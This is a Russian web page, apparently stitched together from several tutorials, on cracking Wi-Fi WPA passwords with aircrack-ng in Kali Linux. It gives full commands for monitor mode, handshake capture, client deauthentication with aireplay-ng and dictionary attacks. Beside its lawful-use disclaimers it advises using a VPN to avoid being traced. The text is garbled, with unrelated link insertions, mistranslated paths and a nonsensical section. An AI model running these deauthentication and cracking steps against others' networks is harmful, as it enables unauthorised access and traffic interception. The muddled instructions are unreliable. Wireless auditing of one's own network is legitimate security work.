Как использовать Aircrack-ng в Kali Linux: подробное руководство
Хотите узнать, как использовать aircrack-ng на Kali Linux? В этой статье вы найдете основы работы с этим инструментом, включая пошаговые инструкции и примеры использования. Получите доступ к качественной информации прямо сейчас!
Если вы работаете в области безопасности, знаете, что WEP и WPA являются стандартными протоколами безопасности Wi-Fi, которые используются в большинстве беспроводных сетей. Эти протоколы обеспечивают защиту от несанкционированного доступа к сети, но они не являются абсолютно надежными.
Именно здесь может пригодиться aircrack-ng, утилита для тестирования безопасности Wi-Fi, которая позволяет проверить насколько защищена ваша собственная сеть Wi-Fi. Эта инструкция научит вас использовать aircrack-ng в Kali Linux для взлома защищенных Wi-Fi сетей.
Прежде чем начать, убедитесь, что вы правомерно используете инструменты в соответствии с законодательством своей страны и не нарушаете права других пользователей. Конечно же, вы не должны использовать эту утилиту для злоупотреблений, незаконного доступа к чужим сетям и кражи личной информации.
Необходимые инструменты и программы
Для успешной работы с aircrack-ng в Kali Linux вам понадобятся следующие инструменты и программы:
- Kali Linux: для запуска aircrack-ng требуется операционная система Kali Linux;
- Стандартный интерфейс беспроводных сетей: убедитесь, что ваша сетевая карта поддерживает режим монитора;
- Aircrack-ng: установите aircrack-ng в Kali Linux, чтобы иметь возможность взламывать Wi-Fi пароли;
- необходимо иметь готовый словарь паролей для эффективного взлома Wi-Fi сетей. Такой словарь можно создать самостоятельно или найти в интернете;
- Дополнительные программы: для удобства работы с aircrack-ng могут потребоваться дополнительные программы, такие как Wireshark для анализа трафика и Airmon-ng для создания виртуальных интерфейсов.
Убедитесь, что у вас есть все необходимые инструменты и программы, прежде чем начинать работу с aircrack-ng в Kali Linux. Это поможет вам избежать проблем и сбоев в процессе взлома Wi-Fi паролей.
Видео по теме:
Подготовка к использованию aircrack-ng
Шаг 1: Установите Kali Linux
Перед тем, как использовать aircrack-ng, необходимо установить Kali Linux. Вы можете скачать и установить его на ваш компьютер или использовать live-CD.
Шаг 2: Обновите пакеты и установите необходимое ПО
Перед использованием aircrack-ng нужно обновить все пакеты. Для этого в терминале нужно ввести:
sudo apt-get update
Затем установите необходимое ПО:
sudo apt-get install aircrack-ng
Шаг 3: Подготовьте беспроводной интерфейс к использованию
- Убедитесь, что ваш беспроводной адаптер поддерживает режим мониторинга
- Включите режим мониторинга:
- Для предпочитаемого вами адаптера: airmon-ng start wlan0
- Если ваш адаптер не поддерживает режим мониторинга, можете попробовать использовать режим ад-хок
- airodump-ng wlan0mon
Готово! Вы подготовили свой компьютер к использованию aircrack-ng.
Сбор информации о беспроводной сети
Aircrack-ng – это набор инструментов для анализа и взлома безопасности беспроводных сетей. Перед тем, как начать использовать aircrack-ng в Kali Linux, необходимо провести сбор информации о беспроводной сети.
Читать далее: Купить краситель в Москве: лучшие магазины и интернет-магазины
Для начала необходимо убедиться, что беспроводная сеть включена и доступна для подключения. Используйте команду ifconfig, чтобы выяснить, какие устройства у вас имеются.
Затем используйте команду iwlist для получения списка доступных беспроводных сетей и их параметров. Информация о сетях будет включать название SSID, уровень сигнала и канал.
Кроме того, можно использовать команду airodump-ng, чтобы получить более подробную информацию о беспроводных сетях и устройствах, которые к ним подключены. Эта команда покажет доступные беспроводные сети, их каналы, MAC-адреса устройств и т.д.
Зная эту информацию, вы сможете выбрать целевую беспроводную сеть и перейти к следующему шагу – сбору пакетов данных.
Вопрос-ответ:
Как установить aircrack-ng на Kali Linux?
Для установки aircrack-ng на Kali Linux выполните следующие шаги: 1) Откройте терминал и введите команду «sudo apt-get update»; 2) Затем введите команду «sudo apt-get install aircrack-ng»; 3) Подтвердите установку, нажав на клавишу «Y». После этого aircrack-ng будет установлен на вашем Kali Linux.
Как использовать aircrack-ng для взлома Wi-Fi пароля?
Мы настоятельно не рекомендуем использовать aircrack-ng для несанкционированного доступа к Wi-Fi сети. Aircrack-ng — это инструмент для проверки безопасности Wi-Fi сетей и может использоваться только с согласия сетевого администратора.
Как запустить aircrack-ng для подбора пароля Wi-Fi?
Для запуска aircrack-ng в режиме подбора пароля Wi-Fi выполните следующие шаги: 1) Откройте терминал и введите команду «sudo airmon-ng start wlan0»; 2) Затем введите команду «sudo airodump-ng wlan0mon»; 3) Откройте новый терминал и введите команду «sudo airodump-ng -c (номер канала) —bssid (BSSID сети) -w (имя файла) wlan0mon»; 4) Затем введите команду «sudo aireplay-ng -0 0 -a (BSSID сети) wlan0mon»; 5) Запустите aircrack-ng командой «sudo aircrack-ng (имя файла.cap) -w (словарь паролей)».
Как добавить словать паролей в aircrack-ng?
Чтобы добавить словарь паролей в aircrack-ng выполните следующие шаги: 1) Создайте новый файл в формате .txt с паролями; 2) Скопируйте содержимое файла в новый файл с расширением .dic; 3) Запустите aircrack-ng с использованием команды «sudo aircrack-ng (имя файла.cap) -w (имя файла.dic)».
Как использовать aircrack-ng для защиты Wi-Fi сети?
Вы можете использовать aircrack-ng для проверки безопасности своей Wi-Fi сети, чтобы убедиться в отсутствии уязвимостей. Если уязвимости обнаружены, вы можете обновить настройки безопасности вашей сети, предпринять соответствующие меры, чтобы защитить ее от взлома. Однако мы настоятельно рекомендуем не использовать aircrack-ng для взлома Wi-Fi сетей без согласия их владельцев.
Можно ли использовать aircrack-ng для взлома протокола WPA2?
Взлом WPA2 пароля с помощью aircrack-ng может занять много времени и требует использования словарей паролей. Однако, если пароль достаточно длинный и использует буквы разного регистра, цифры и символы, то aircrack-ng не сможет его взломать в разумные сроки. Кроме того, многие Wi-Fi точки доступа автоматически блокируют атаки по взлому паролей, что делает такой подход попросту бесполезным.
Как использовать aircrack-ng для сканирования Wi-Fi сетей?
Для сканирования Wi-Fi сетей с помощью aircrack-ng выполните следующие шаги: 1) Откройте терминал и введите команду «sudo airmon-ng start wlan0»; 2) Затем введите команду «sudo airodump-ng wlan0mon». После этого aircrack-ng начнет сканирование доступных Wi-Fi сетей и отобразит информацию о них, включая имя сети, BSSID, частоту и уровень сигнала.
Запуск airodump-ng для перехвата трафика
Для начала перехвата трафика необходимо запустить утилиту airodump-ng в командной строке Kali Linux.
Для этого вам нужно ввести команду в следующем формате:
airodump-ng [интерфейс]
Здесь [интерфейс] — это имя вашего беспроводного интерфейса. Вы можете увидеть его, используя команду ifconfig.
Когда вы вводите эту команду, вы увидите список беспроводных сетей в вашем радиусе действия.
Читать далее: Как выровнять картинку по центру в HTML: простые способы и лучшие практики
После запуска airodump-ng вы можете выбрать конкретную сеть, которую вы хотите анализировать, и начать перехват трафика, используя следующую команду:
airodump-ng -c [номер канала] —bssid [BSSID] -w [имя файла] [интерфейс]
Здесь [номер канала] — это номер канала беспроводной сети, [BSSID] — это MAC-адрес точки доступа, [имя файла] — это имя файла, в котором сохранятся данные перехвата трафика, который вы можете исследовать в будущем.
После запуска этой команды вы увидите, как airodump-ng начнет активно перехватывать трафик на выбранной вами беспроводной сети. Когда вы захотите остановить этот процесс, нажмите Ctrl + C.
Результаты перехвата трафика будут сохранены в файле, который вы указали в команде. Вы можете просмотреть эти данные, используя другую утилиту aircrack-ng.
Запуск aireplay-ng для генерации трафика
Взломщиками Wi-Fi-сетей часто используется aireplay-ng – утилита, которая способна генерировать трафик, необходимый для взлома защиты. Что же нужно сделать, чтобы запустить aireplay-ng на Kali Linux?
- Откройте терминал в Kali Linux и убедитесь, что вы находитесь в режиме мониторинга (проверьте вывод команды airmon-ng).
- Запустите aireplay-ng с помощью команды aireplay-ng —test [BSSID], где вместо [BSSID] укажите MAC-адрес точки доступа.
- Если aireplay-ng запустился корректно, вы увидите множество строк, содержащих информацию о пакетах, отправляемых к точке доступа.
Для генерации трафика с другими опциями можно использовать команду aireplay-ng с соответствующими ключами. Например, команда aireplay-ng -3 -b [BSSID] [monitor interface] генерирует ARP-запросы и повторяет их для увеличения количества пакетов. Таким образом, при помощи aireplay-ng можно найти уязвимости в Wi-Fi-сетях и проводить успешный взлом.
Запуск aircrack-ng для взлома пароля
Шаг 1: Подготовка атаки
Перед запуском aircrack-ng необходимо подготовить поток данных, который будем использовать в атаке на пароль. Для этого запустите программу airodump-ng с параметрами:
- Имя сети (ESSID)
- Канал
- Вывод в файл
Пример команды: airodump-ng —essid MyNetwork —channel 6 -w capture wlan0mon
После запуска команды airodump-ng программа будет захватывать пакеты данных в поток capture, который мы укажем как параметр для aircrack-ng в следующем шаге.
Шаг 2: Запуск aircrack-ng
После завершения захвата пакетов данных необходимо запустить aircrack-ng с использованием файла capture, который мы создали на предыдущем шаге. Пример команды:
- aircrack-ng -w password.lst capture-01.cap
В данном случае мы используем словарь паролей password.lst (можно использовать любой другой словарь) и файл capture-01.cap, который содержит захваченные пакеты данных.
Шаг 3: Ожидание результата
Программа aircrack-ng начнет перебирать пароли из словаря и попытается найти совпадение с захваченным потоком данных. В зависимости от длины словаря и сложности пароля, этот шаг может занять от нескольких минут до нескольких часов. После успешного нахождения пароля aircrack-ng выдаст его на экран.
Использование aircrack-ng может быть незаконным в зависимости от того, каким образом вы используете эту программу. Пожалуйста, используйте ее только в соответствии с законодательством и только с согласия владельца сети Wi-Fi.
Использование словарей для взлома пароля
Словари – это файлы, содержащие списки слов и комбинаций, которые могут использоваться в пароле. Они могут помочь значительно сократить время на взлом пароля в сравнении с методом перебора.
В aircrack-ng существует возможность использования словарей для взлома пароля. Для этого необходимо указать путь к файлу со словарем при запуске команды aircrack-ng, используя опцию -w.
Для повышения эффективности взлома следует использовать несколько словарей разной длины и включающих в себя разнообразные комбинации символов. Кроме того, можно создавать собственные словари, содержащие комбинации, которые могут использоваться конкретным пользователем в пароле.
Важно понимать, что использование словарей имеет свои ограничения – если в пароле используется необычная комбинация символов или методы обхода защиты, то взлом с помощью словарей может оказаться неэффективным.
Читать далее: Кратные в математике: что это такое и как их находить?
Ручной ввод WPA-пароля для взлома
Для взлома пароля WPA необходимо знать сам пароль, что иногда может быть проблемой. В таком случае имеется возможность ввести пароль вручную при помощи аргумента -w:
- aircrack-ng -a2 -b 00:11:22:33:44:55 -w password.lst capture.cap
- -a2 указывает тип атаки (WPA-PSK);
- -b 00:11:22:33:44:55 указывает BSSID точки доступа;
- -w password.lst является путем к словарю паролей;
- capture.cap — имя файла захвата пакетов.
При использовании данного аргумента aircrack-ng будет проводить атаку только с введенным паролем, что может значительно сократить время взлома.
Необходимо помнить, что пароль должен быть точным и полным со всеми спецсимволами, регистром букв и пр., иначе атака завершится неудачей.
Использование aircrack-ng для анализа безопасности сети
Aircrack-ng является инструментом для анализа и тестирования безопасности беспроводных сетей. Он может использоваться для оценки безопасности существующих беспроводных сетей и для проверки собственных сетей на наличие уязвимостей.
Aircrack-ng позволяет злоумышленникам анализировать защиту беспроводных сетей и производить атаки на WEP и WPA сети. Использование данного инструмента может помочь владельцам сетей обнаружить уязвимости, которые могут привести к несанкционированному доступу к чужим сетям.
Одним из главных преимуществ использования aircrack-ng является то, что он может использоваться для обнаружения слабых паролей Wi-Fi сетей. Он может искать ключи WEP и WPA/WPA2, а также расшифровывать зашифрованный трафик.
В целом использование aircrack-ng требует знаний о работе беспроводных сетей и методов атаки на них, но это важный инструмент для анализа безопасности беспроводных сетей. Использование данного инструмента поможет обнаружить уязвимости в вашей беспроводной сети и защитить ее от злоумышленников.
Основные команды aircrack-ng
aircrack-ng — это набор инструментов для анализа беспроводных сетей, включая возможность взлома WEP и WPA/WPA2 PSK паролей. Ниже представлены основные команды aircrack-ng:
- airmon-ng: используется для запуска мониторного режима на интерфейсе Wi-Fi. Команда airmon-ng check позволяет проверить, какие процессы могут мешать работе мониторинга.
- airodump-ng: используется для сбора информации о беспроводных сетях в диапазоне вашего Wi-Fi адаптера, такой как их идентификаторы (BSSID, ESSID), каналы и используемые шифрования.
- aireplay-ng: используется для создания трафика в беспроводной сети. Например, с помощью этой команды можно отправлять дублированные пакеты ARP и таким образом генерировать трафик, который потом может быть захвачен и использован в качестве входных данных для aircrack-ng.
- aircrack-ng: используется для взлома паролей WEP и WPA/WPA2 PSK. В качестве входных данных этой команде нужны файлы, полученные с помощью предыдущих команд airowdump-ng и aireplay-ng.
Также, стоит отметить команду airdecap-ng, которая используется для дешифровки захваченного трафика, например, чтобы расшифровать зашифрованные сообщения, перехваченные в WPA/WPA2 PSK защищенной сети.
Советы по безопасности
Когда работаете с Aircrack-ng в Kali Linux, важно соблюдать определенные меры безопасности, чтобы защитить свою систему и данные. Вот несколько полезных советов:
- Не используйте Aircrack-ng для злоумышленных целей. Использование этого инструмента для взлома чужих Wi-Fi сетей или других преступных целей — незаконно и неэтично.
- Включите мониторинг в режиме слушателя. Прежде чем запустить Aircrack-ng, убедитесь, что ваша сетевая карта настроена на мониторинг в режиме слушателя.
- Используйте VPN при работе с Aircrack-ng. VPN (виртуальная частная сеть) защищает ваше соединение, скрывает ваш IP-адрес и обезопасит вас, если вашу деятельность перехватят.
- Следуйте инструкциям внимательно. Если вы новичок в Aircrack-ng, подробно изучите руководства и инструкции по использованию этого инструмента, чтобы добиться правильных результатов.
- Не подключайтесь к чужим Wi-Fi сетям без разрешения. Использование Aircrack-ng для доступа к чужому Wi-Fi сети без разрешения является незаконным и может иметь серьезные юридические последствия.
Соблюдение этих простых мер безопасности поможет вам работать с Aircrack-ng безопасно и эффективно.
Инструменты Kali Linux
Список инструментов для тестирования на проникновение и их описание
Airmon-ng
Описание Airmon-ng
airmon-ng — это баш скрипт, созданный для перевода беспроводных карт в режим наблюдения.
Автор: Thomas d’Otreppe, Первоначальная работа: Christophe Devine
Справка по Airmon-ng
airmon-ng
[канал или частота] Руководство по Airmon-ng
airmon-ng
[канал] airmon-ng [kill] airmon-ng — это скрипт, который может использоваться для включения режима наблюдения на беспроводном интерфейсе. Он также может использоваться для перевода из режима наблюдения в режим управляемости. Ввод команды airmon-ng без параметров отобразит статус интерфейсов. Она может выводить список/убивать программы, которые могут вмешиваться в беспроводную карту и также устанавливает верные источники в /etc/kismet/kismet.conf.
start [канал]
Включает режим наблюдения на интерфейсе (и задаёт канал).
check [kill]
Список программ, которые могут вмешиваться в беспроводную карту. Если указать ‘kill’, то будет сделана попытка убить их всех.
Примеры запуска Airmon-ng
Просматриваем доступные сетевые интерфейсы:
sudo airmon-ng PHY Interface Driver Chipset phy0 wlan0 iwlwifi Intel Corporation Centrino Advanced-N 6235 (rev 24)
Проверяем процессы, которые могут нам помешать
sudo airmon-ng check Found 5 processes that could cause trouble. If airodump-ng, aireplay-ng or airtun-ng stops working after a short period of time, you may want to kill (some of) them! PID Name 799 NetworkManager 894 wpa_supplicant 905 dhclient 1089 avahi-daemon 1090 avahi-daemon
Перед переводом в режим наблюдения, убиваем процессы, которые нам могут помешать:
sudo airmon-ng check kill Killing these processes: PID Name 894 wpa_supplicant 905 dhclient
Пытаемся перевести интерфейс wlan0 в режим наблюдения:
sudo airmon-ng start wlan0 PHY Interface Driver Chipset phy0 wlan0 iwlwifi Intel Corporation Centrino Advanced-N 6235 (rev 24) (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon) (mac80211 station mode vif disabled for [phy0]wlan0)
Проверяем, была ли беспроводная карта переведена в режим монитора:
sudo iwconfig eth0 no wireless extensions. wlan0mon IEEE 802.11 Mode:Monitor Frequency:2.457 GHz Tx-Power=20 dBm Retry short limit:7 RTS thr:off Fragment thr:off Power Management:off lo no wireless extensions.
Сетевая карта изменила название интерфейса и переведена в режим монитора, наблюдения (об этом свидетельствует строка Monitor).
Возврат в режим управляемости
sudo airmon-ng stop wlan0mon PHY Interface Driver Chipset phy0 wlan0mon rt2800usb Ralink Technology, Corp. RT3572 (mac80211 station mode vif enabled on [phy0]wlan0) (mac80211 monitor mode vif disabled for [phy0]wlan0mon)
Альтернативный способ перевода в режим монитора
Вы можете использовать альтернативный вариант перевода беспроводного интерфейса в режим наблюдения:
sudo ifconfig wlan0 down sudo iwconfig wlan0 mode monitor sudo ifconfig wlan0 up
Или в одну строку
sudo ifconfig wlan0 down && sudo iwconfig wlan0 mode monitor && sudo ifconfig wlan0 up
sudo iwconfig eth0 no wireless extensions. wlan0mon IEEE 802.11abgn Mode:Monitor Frequency:2.457 GHz Tx-Power=15 dBm Retry short limit:7 RTS thr:off Fragment thr:off Power Management:off lo no wireless extensions.
Всё прошло успешно — сетевая карта переведена в режим наблюдения (об этом говорит строка Mode:Monitor).
Возврат в управляемый режим:
ifconfig wlan0 down iwconfig wlan0 mode managed ifconfig wlan0 up
Перевод в режим монитора с помощью команд ip и iw
Команды ifconfig и iwconfig признаны устаревшими. Поэтому хотя предыдущий способ попрежнему прекрасно работает, доступна альтернативная его реализация с помощью новых программ. Узнайте имя беспроводного интерфейса:
sudo iw dev phy#0 Interface wlan0 ifindex 5 wdev 0x3 addr 5a:88:f2:f6:52:41 type managed txpower 20.00 dBm
Далее выполните последовательность команд
sudo ip link set down sudo iw set monitor control sudo ip link set up
заменив на действительное имя вашего беспроводного интерфейса (у меня это wlan0):
sudo ip link set wlan0 down sudo iw wlan0 set monitor control sudo ip link set wlan0 up
В BlackArch (имя интерфейса wlp2s0), последовательность команд выглядит так:
sudo ip link set wlp2s0 down sudo iw wlp2s0 set monitor control sudo ip link set wlp2s0 up
Команда в одну строку:
sudo ip link set wlp2s0 down && sudo iw wlp2s0 set monitor control && sudo ip link set wlp2s0 up
Следующая большая команда должна сама определять имя беспроводного интерфейса и переводить его в режим монитора:
t=`sudo iw dev | grep 'Interface' | sed 's/Interface //'`;sudo ip link set $t down && sudo iw $t set monitor control && sudo ip link set $t up
Возврат в управляемый режим:
sudo ip link set down sudo iw set type managed sudo ip link set up
Для интерфейса wlan0 реальные команды выглядят так:
sudo ip link set wlan0 down sudo iw wlan0 set type managed sudo ip link set wlan0 up
NetworkManager препятствует переводу беспроводной карты в режим наблюдения
При определённых условиях NetworkManager может не дасть Wi-Fi адаптеру перевестись в режим монитора. Более того, уже переведённую в режим монитора беспроводную карту он может вернуть в управляемый режим. Поэтому рекомендуется отключать NetworkManager при тестировании на проникновение беспроводных сетей.
В Kali Linux и BlackArch это делается так:
sudo systemctl stop NetworkManager
Примечание, после отключения NetworkManager пропадёт Интернет!
Установка Airmon-ng
Программа предустановлена в Kali Linux.
Установка в другие операционные системы
Эта программа из пакета Aircrack-ng. Т.е. для её установки нужно установить Aircrack-ng.
Скриншоты Airmon-ng
Инструкции по Airmon-ng
- Как перевести беспроводную карту в режим монитора (контроля) в Kali Linux
- Перевод беспроводной карты в режим монитора (наблюдения) в Kali Linux с использованием команд ip и iw
- Как взломать Wi-Fi
- Перевод беспроводной карты в режим монитора (наблюдения) в BlackArch
- Перевод беспроводной карты в режим монитора (наблюдения) в BlackArch с использованием команд ip и iw
- USB Wi-Fi адаптеры с поддержкой режима монитора и беспроводных инъекций (100% совместимые с Kali Linux) на 2021
- Виртуальные Wi-Fi интерфейсы для одновременного использования Wi-Fi адаптера в разных режимах
Используйте Aircrack-ng для проверки пароля Wi-Fi в Kali Linux
Это будет работать с любым дистрибутивом Linux, но рекомендуется использовать Kali.
Требования
Рабочий дистрибутив Linux с адаптером WiFi и привилегиями root.
Сложность
Условные обозначения
- # — требует данных команды linux для выполнения с привилегиями root либо непосредственно как пользователь root, либо с использованием судо команда
- $ — требует данных команды linux будет выполняться как обычный непривилегированный пользователь
Вступление
У большинства людей ужасные пароли, и Wi-Fi не исключение. Ваш пароль WiFi — это ваша основная линия защиты от несанкционированного доступа к вашей сети. Этот доступ может привести к целому ряду других неприятностей, потому что злоумышленник может отслеживать трафик в вашей сети и даже получать прямой доступ к вашим компьютерам.
Лучший способ предотвратить такое вторжение — использовать те же инструменты, что и злоумышленник, чтобы проверить безопасность вашего пароля WiFi.
Установить Aircrack-ng
В этом руководстве будет использоваться набор инструментов Aircrack. Они уже установлены в Kali, поэтому вам не нужно ничего делать. Если вы используете другой дистрибутив, они находятся в ваших репозиториях.
$ sudo apt install aircrack-ng
Сканировать вашу сеть
Сначала узнайте, как называется ваш беспроводной интерфейс. ip a . Как только он у вас есть, вы можете использовать Airmon-NG создать на нем виртуальный интерфейс мониторинга.
$ sudo airmon-ng start wlan0
Результат команды даст вам имя нового виртуального интерфейса. Это имеет тенденцию быть пн0 .
Выгрузите результаты монитора в терминал, чтобы вы могли их увидеть.
$ sudo airodump-ng mon0
Вы можете увидеть таблицу данных, относящихся к беспроводным сетям в вашем районе. Вам нужна только информация о вашей собственной сети. Найдите его и обратите внимание на BSSID и канал, на котором он находится.
Выгрузить результаты в файл
Затем вы собираетесь записать результаты сканирования в файл. Этот журнал захвата понадобится Aircrack для последующего выполнения атаки методом грубой силы в сети. Чтобы получить снимок, вы собираетесь запустить ту же команду, что и раньше, но вы должны указать свой BSSID, канал и местоположение журнала.
$ sudo airodump-ng -c 1 --bssid XX: XX: XX: XX: XX: XX -w Документы / журналы / wpa-crack mon0
Введите свою фактическую информацию перед запуском команды и оставьте ее выполненной.
Отключить клиента
Откройте новый терминал. Вы собираетесь использовать его для отключения одного из клиентов в вашей сети. Взгляните на нижнюю таблицу в другом окне. airodump-ng . Он содержит BSSID вашей сети вместе с BSSID клиентов. Выберите один и используйте следующие команда linux с этой информацией.
$ sudo aireplay-ng -0 0 -c BSSID КЛИЕНТА -a BSSID СЕТИ mon0
Возможно, вам потребуется добавить —ignore-negative-один флаг к команде.
Эта команда будет выполняться бесконечно, постоянно отключая этого клиента. В первой строке airodump-ng окна, найдите сообщение о рукопожатии, которое появится в конце строки. Будет труднее увидеть, если тебе пришлось бежать —ignore-negative-один потому что сообщение об этом будет занимать то же место, в результате чего сообщение рукопожатия будет мигать в течение секунды, прежде чем будет перезаписано.
Уже через пару минут можно спокойно останавливать запросы на отключение и дамп. Вы можете прекратить раньше, если увидите сообщение о рукопожатии.
Получите список слов
Атаки методом грубой силы просматривают список слов, проверяя каждую возможность. Итак, чтобы выполнить одно, вам понадобится список слов для проверки. В Kali Linux уже есть несколько. Если у вас другой дистрибутив, вы можете найти его в Интернете, но лучший способ получить их — это Kali. Стоит загрузить live CD или виртуальную машину, чтобы просто снять их.
На Кали они расположены в /usr/share/wordlists . В этом руководстве будет рассказано rockyou.txt , но вы можете использовать любой из них.
Если вы действительно хотите быть предельно тщательным, вы можете использовать Хруст создавать свои собственные списки слов. Остерегайтесь, они могут быть очень массивными.
Атака!
Теперь, когда у вас есть список слов и ваш захват, вы готовы к атаке. Для этого вы будете использовать фактический Aircrack-ng команду и передав ей список слов и захват.
$ sudo aircrack-ng -w rockyou.txt Документы / журналы / wpa-crack-01.cap
Чтобы просмотреть этот список, может потребоваться много времени, так что наберитесь терпения. Если у вас более мощный компьютер, нет ничего плохого в том, чтобы установить на него Aircrack и перенести на него оба файла.
Когда Aircrack закончит, он сообщит вам, нашел он пароль или нет. Если это так, пора сменить пароль.
Заключительные мысли
Воспоминание этот процесс следует использовать только для проверки вашей собственной безопасности. Использование его в чужой сети — это незаконный.
Всегда используйте надежные парольные фразы, содержащие как можно больше символов, включая специальные символы и числа. По возможности избегайте употребления общих словарных слов.
Подпишитесь на новостную рассылку Linux Career Newsletter, чтобы получать последние новости, вакансии, советы по карьере и рекомендуемые руководства по настройке.
LinuxConfig ищет технических писателей, специализирующихся на технологиях GNU / Linux и FLOSS. В ваших статьях будут представлены различные руководства по настройке GNU / Linux и технологии FLOSS, используемые в сочетании с операционной системой GNU / Linux.
Ожидается, что при написании статей вы сможете идти в ногу с технологическим прогрессом в вышеупомянутой технической области. Вы будете работать самостоятельно и сможете выпускать как минимум 2 технических статьи в месяц.
Сделайте постоянный USB-накопитель Kali Linux
ЗадачаСоздайте постоянный USB-накопитель Kali Linux.РаспределенияЭто будет работать из любого дистрибутива.ТребованияРабочая установка Linux с привилегиями root. Вам также понадобится USB-накопитель объемом не менее 8 ГБ.СложностьЛегкоУсловные обо.
Изучите Burp Suite на Kali Linux: Часть 4
ВступлениеВажно помнить, что Burp Suite — это программный пакет, и поэтому потребовалась целая серия, чтобы охватить хотя бы основы. Поскольку это пакет, в него входит больше инструментов, которые работают вместе друг с другом и с прокси-сервером.
Как взломать zip-пароль в Kali Linux
- 08/08/2021
- 0
- Файловая системаКалиБезопасностьКоманды
Цель этого руководства — показать, как взломать пароль для zip файл на Kali Linux.По умолчанию Kali включает инструменты для взлома паролей для этих сжатых архивов, а именно утилиту fcrackzip, Джон Потрошитель и список слов. Следуйте вместе с нами.
Как получить пароль WPA2 WiFi с помощью Aircrack-ng?
В этой статье я покажу вам как использовать airmon-ng (скрипты из пакета aircrack-ng) для обнаружения беспроводных сетей вокруг нас. Затем мы деаутентифицируем клиентов определенной беспроводной сети, чтобы перехватить handshake, а затем расшифруем его, чтобы найти пароль WiFi.
Сеть, которую я буду атаковать, является моей собственной сетью, я не буду атаковать чужую сеть. Пожалуйста, не используйте эту информацию в неэтических целях. То, чем я здесь делюсь, предназначено только для образовательных целей.
Прежде чем приступить к работе, давайте посмотрим, что нам понадобится:
- Сетевой адаптер WiFi, поддерживающий режим монитора.
- Kali Linux или любой другой дистрибутив Linux с установленным пакетом Aircrack-ng.
- Словарь паролей (список слов wordlist.txt).
Давайте начнем, первым делом мы должны проверить наличие WIFI-адаптера, что он подключен к Kali Linux, чтобы сделать это, пожалуйста, введите команду ниже:
Откройте терминал и введите:
Здесь будут показаны все сетевые интерфейсы, подключенные к вашему устройству:
Если ваш беспроводной сетевой адаптер подключен и распознан в операционной системе, вы должны увидеть » wlan0 «, как показано на фото выше. Обратите внимание, что имя может измениться, если у вас несколько подключенных беспроводных адаптеров.
Теперь для включения режима монитора введите следующую команду:
kali@kali:~$ sudo airmon-ng start wlan0
Режим мониторинга включен, теперь мы должны убить все PID, которые мешают работе адаптера, Эти процессы выделены красным цветом в примере выше. Убить процессы можно с помощью команды kill :
kali@kali:~$ kill 508 1420
Итак, теперь давайте обнаружим беспроводные сети вокруг нас. Для этого используем команду sudo airodump-ng wlan0 :
kali@kali:~$ airodump-ng wlan0
Для того чтобы остановить процесс поиска и сохранить список обнаруженных сетей нажмите Ctrl + C :
Как вы можете видеть, обнаружена целая куча беспроводных сетей. Итак, вот BSSID или MAC-адреса беспроводных сетей в первом столбце. Меня интересует сеть под названием Kali на канале 1. Обратите внимание на номер канала и MAC-адрес целевой точки доступа. В моем случае:
- Channel: 1
- BSSID: 50:D4:F7:E5:66:F4
Далее мы будем использовать команду sudo airodump-ng -c 1 -w kali —bssid wlan0 :
kali@kali:~$ airodump-ng -c 1 -w kali —bssid 50:D4:F7:E5:66:F4 wlan0
Итак, в этом окне мы перехватываем пакеты, пытаясь перехватить handshake, теперь откройте второе окно для деаутентификации клиентов из сети. Это действие ускорит перехват рукопожатия. Для деаутентификации мы будем использовать aireplay-ng:
kali@kali:~$ aireplay-ng -0 0 -a 50:D4:F7:E5:66:F4 wlan0
Пока мы не зафиксировали handshake, но как только я деаутентифицирую клиентов, мы получим рукопожатие WPA, как показано на изображении ниже:
Теперь нам нужно расшифровать handshake. В терминале вводим ls , чтобы перечислить все текущие каталоги и файлы. Выбираем файл с расширением «.cap», который должен называться kali-01.cap, и вводим следующую команду:
kali@kali:~$ aircrack-ng -w wordlist.txt kali-01.cap
Инструмент aircrack-ng сравнивает хэш внутри файла .cap с хэшами паролей, перечисленных в файле wordlist.txt, преобразуя каждую строку из текста в хэш, и если хэши совпадают, мы получаем пароль от WIFI. 🙂
Теперь все, что вам нужно сделать, это подождать, пока вы не увидите «KEY Found (ваш ключ здесь )».
Всем спасибо за внимание! 🙂